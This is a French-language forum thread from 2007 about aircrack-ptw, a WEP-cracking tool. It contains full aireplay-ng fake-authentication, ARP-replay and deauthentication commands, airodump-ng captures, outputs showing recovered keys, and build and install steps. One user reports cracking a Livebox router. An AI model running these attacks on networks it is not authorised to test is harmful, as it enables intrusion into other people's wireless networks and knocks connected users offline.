http://forums.remote-exploit.org/showthread.php?t=6251
Si je comprend bien ce qui est écrit sur ce forum, cela permettrait de decrypter la clé en ayant besoin de beaucoup moins de données.
J'ai lu en travers les liens donc j'ai pas trop saisi comment utiliser cet aircrack-ptw, tout ce que j'ai vu c'est qu'il ne faut pas enregistrer avec --ivs...
Bon je verrai ça plus tard
Hors ligne
Les articles de ce blog sont pas mal:
http://sid.rstack.org/blog/index.php/20 … a-couronne
Cette nouvelle technique permettrait de casser une clé WEP de 104 bits avec moins de 100000 paquets ARP capturés sur le réseau, là où aircrack-ng en nécessite quelques 600000, et encore, quand on a de la chance. Il s'agit donc d'un pas considérable que forcément je ne pouvais m'empêcher d'étudier, et surtout de tester, dans la mesure où l'outil implémentant cette nouvelle attaque, aircrack-ptw, est disponible. Et là, c'est le drame...
stats for bssid 00:16:B0:3D:E4:32 keyindex=0 packets=40297
Found key with len 13: 7A 52 C3 A0 EB DA 0E D3 00 02 24 4D 40
Et oui, c'est encore de ces faux poissons d'avril, une vraie nouvelle publiée un 1er avril. Si on n'en attendait pas moins de la part de cryptographes, il ne faudrait pas que ça devienne une mode non plus...
Hors ligne
et ?
Hors ligne
Toi aussi tu t'y met .
J'ai lu en travers les liens donc j'ai pas trop saisi comment utiliser cet aircrack-ptw, tout ce que j'ai vu c'est qu'il ne faut pas enregistrer avec --ivs...
L'attaque se déroule comme une attaque classique avec aircrack-ng :
~# aireplay-ng --fakeauth 0 -a 00:16:B0:3D:E4:32 \
-h 00:01:02:03:04:05 -e test ath1
10:01:48 Sending Authentication Request
10:01:48 Authentication successful
10:01:48 Sending Association Request
10:01:48 Association successful :-)~# aireplay-ng --arpreplay -b 00:16:B0:3D:E4:32 \
-h 00:01:02:03:04:05 ath1
Saving ARP requests in replay_arp-0404-100153.cap
You should also start airodump-ng to capture replies.~# aireplay-ng --deauth -0 -a 00:16:B0:3D:E4:32 \
-c 00:0E:67:4B:23:DC ath1
10:02:39 Sending DeAuth to station
-- STMAC: [00:0E:67:4B:23:DC]
10:02:40 Sending DeAuth to station
-- STMAC: [00:0E:67:4B:23:DC]
10:02:40 Sending DeAuth to station
-- STMAC: [00:0E:67:4B:23:DC]~# airodump-ng -w test --channel 1 ath1 CH 1 ][ Elapsed: 7 mins ][ 2007-04-04 10:08 BSSID PWR Beacons # Data CH MB ENC ESSID 00:16:B0:3D:E4:32 50 4284 40968 1 54 WEP test BSSID STATION PWR Packets Probes 00:16:B0:3D:E4:32 00:0E:67:4B:23:DC 62 19732 test 00:16:B0:3D:E4:32 00:01:02:03:04:05 51 22361 test
$ aircrack-ptw test-01.cap
This is aircrack-ptw 1.0.0
For more informations see
http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:16:B0:3D:E4:32 keyindex=0
stats for bssid 00:16:B0:3D:E4:32 keyindex=0 packets=40297
Found key with len 13: 7A 52 C3 A0 EB DA 0E D3 00 02 24 4D 40Le tuto est peut être lui aussi à revoir..
Hors ligne
il faudrait penser à te calmer un petit peu
Hors ligne
lol tu demande si qulqu'un connais aircrack-ptw.
je met un passage d'un lien pour te donner envie de lire la suite ou tout est expliquer; tu répond "et".
Faut faire quoi alors?
Hors ligne
Ben que tu réflechisse un peu...
Tu as pas vu que j'avais mis un lien ?? et que j'ai marqué je m'y interesserai plus tard..
Je suis tombé dessus à midi mais j'avais pas le temps de tout lire, j'ai quand meme pris 2 minutes pour poster sur le forum et mettre le lien pour ceux qui seraient interessés.
car au cas où ça t'aurai échappé (surement pas vu comme tu es fort) le sujet n'a aps été abordé sur le forum...
Hors ligne
Tu fait dans l'humanitaire? ![]()
car au cas où ça t'aurai échappé (surement pas vu comme tu es fort)
Je vomi.
Dernière modification par tefal (08-04-2007 18:26:57)
Hors ligne
Pas de stress les gars.
Merci pour l'info, je ne connaissais pas du tout.
Il y a de nouveau algo de crack wep peut etre que ce nouvel aircrack les implemente.
Meriterais un petit test ![]()
Hors ligne
Franchement wxcvbn je ne comprend vraiment pas ta réaction...
En tout cas je vais tester ça au plus vite (normalement d'ici ce soir) et peut-être en faire un mini-tutorial que Billy complétera par la suite ![]()
Hors ligne
zac a écrit:
En tout cas je vais tester ça au plus vite (normalement d'ici ce soir) et peut-être en faire un mini-tutorial que Billy complétera par la suite
Oui très intéressant cet article, merci à nos deux dénicheurs !
En tout cas je pensais que le WEP touchait le fond, la il casse carrément la baraque ^^
Si Zac peut nous faire des petits screenshots, ce serait perfect ![]()
Hors ligne
tefal a écrit:
Tu fait dans l'humanitaire?
car au cas où ça t'aurai échappé (surement pas vu comme tu es fort)
Je vomi.
Zac> tu comprend mieux ma réaction quand tu lis ça ?
Hors ligne
Heu tu n'a pas réagi à sa.
Hors ligne
c'est dans la même lignée
Hors ligne
Au moins au pourras pas dire que mes post sont insipide ![]()
Hors ligne
La tutorial sera disponible dans 1 heure maximum.
Bien sûr celui-ci sera loin d'être complet, Mais il vous donneras déjà une première impression ![]()
Hors ligne
Hors ligne
D'après ce que j'ai lu on peut l'installer sur BT2 en Live CD...mais airoscript ne le reconnait pas
Originally Posted by zambuka42
not as of now, aircrack-ng and aircrack-ptw are two completely different programs with similiar names. Your airoscript has no clue about it.
""""I, however, am almost done with a script I've been writing for a while which will not only use aircrack-ptw, but it is optimized for 1 or 2 wireless cards, runs in CLI, and is pretty intelligent (meaning it has automatic contingencies for many conceivable difficulties you may run in to) I'll be releasing it here for anyone who cares to test it out.""""" http://forums.remote-exploit.org/showth … #post25524
Je cite le court dialogue d'un compilateur:
bt aircrack-ptw-1.0.0 # make
gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 -lpcap aircrack-ptw.c aircrack-ptw-lib.c
/tmp/ccs3gLp1.o(.text+0xaf): In function `main':
: undefined reference to `pcap_open_offline'
/tmp/ccs3gLp1.o(.text+0xcf): In function `main':
: undefined reference to `pcap_datalink'
/tmp/ccs3gLp1.o(.text+0x107): In function `main':
: undefined reference to `pcap_next_ex'
/tmp/ccs3gLp1.o(.text+0x2f0): In function `main':
: undefined reference to `pcap_next_ex'
collect2: ld returned 1 exit status
make: *** [aircrack-ptw] Error 1
bt aircrack-ptw-1.0.0 #
"yes, I figured out the problem. Open the Makefile, and move the -lpcap to the end of the gcc line. I love this program!!!!"
"aircrack-ptw: aircrack-ptw.c aircrack-ptw-lib.c aircrack-ptw-lib.h
gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 aircrack-ptw.c aircrack-ptw-lib.c -lpcap
attacksim: attacksim.c aircrack-ptw-lib.c aircrack-ptw-lib.h
gcc -o attacksim -Wall -fomit-frame-pointer -O3 attacksim.c aircrack-ptw-lib.c -lpcap
clean:
rm -f aircrack-ptw attacksim"
Dernière modification par kungfuserge (09-04-2007 09:22:23)
Hors ligne
Si la lib "libpcap" est compiler sur bt2, alors la compilation de ce soft sera possible.
Pour en revenir à aircrack-ptw, je l'ai testé sur deux ap différents avec à peu près 500 000 ivs et il n'a rien cracké du tout... (sachant que l'un des deux n'avait qu'une clé wep 64 bits
)
Enfin bon, libre à vous de le tester...
Hors ligne
Avec 30 000 j'en ai eu assez sur une clef de 64.
bssid = 00:14:7F:AB:47:DB keyindex=0 stats for bssid 00:14:7F:AB:47:DB keyindex=0 packets=32762 Found key with len 05: 6D 97 02 46 14
Dernière modification par tefal (09-04-2007 20:15:38)
Hors ligne
tefal> tu l'a intégré sous backtrack v2 ou bien tu as une installation "en dur" ?
car j'aimerai bien que qqn detaille clairement les manips à faire pour l'installer quand on se sert d'un live-cd.
Hors ligne
Hors ligne
--------------------------------------------------------------------------------
Quote:
Originally Posted by kungfuserge
Hello
I'm a newbie and I am running BT.2 on live CD ;
Can you indicate How to Install Aircrack-ptw ....I understand that it needs Lipcap0.8-dev to be installed first; so I'm rather confused on what to do and which command to use...
I would be very much interested on an update of BT.2 including aircrack-ptw
Reg.
Ok folks, a few peeps have asked me for a step by step on this easy little tools, so here goes:
Download Aircrack-ptw (you can find the link above, I can't add a URL right now)
Untar it: tar -xvzf aircrack-ptw-1.0.0.tar.gz
cd aircrack-ptw-1.0.0
edit the Makefile with whatever editor you use
change the first GCC line to:
gcc -o aircrack-ptw -Wall -fomit-frame-pointer -O3 aircrack-ptw.c aircrack-ptw-lib.c -lpcap
Change the second GCC line to:
gcc -o attacksim -Wall -fomit-frame-pointer -O3 -lpcap
Exit the editor
type "make"
the aircrack-ptw executable has now been created
copy it wherever you want (preferably your path)
enjoy
Dernière modification par kungfuserge (10-04-2007 07:41:03)
Hors ligne
wxcvbn> Chez moi je l'ai compiler sur ma distrib.
zac> Sa vien pas de ta compile? Car chez moi il marche très bien ce coquin:
# /home/Dax/aircrack-ptw-1.0.0/aircrack-ptw /mnt/fichier/wlan/capture/bul-01.cap This is aircrack-ptw 1.0.0 For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/ allocating a new table bssid = C6:B9:D1:58:2D:58 keyindex=0 stats for bssid C6:B9:D1:58:2D:58 keyindex=0 packets=11944 Found key with len 05: 30 A7 AD 74 1B
Hors ligne
Marche très bien ce programme: 100 000 IVS pour une livebox avec attaque chopchop et clef trouvée
Petite question: il n'existe pas de programmes pour convertir les fichiers ivs en fichier cap?? je crois que c'est plutôt le contraire: CAP=>IVS Quelqu'un peut confirmer???
Hors ligne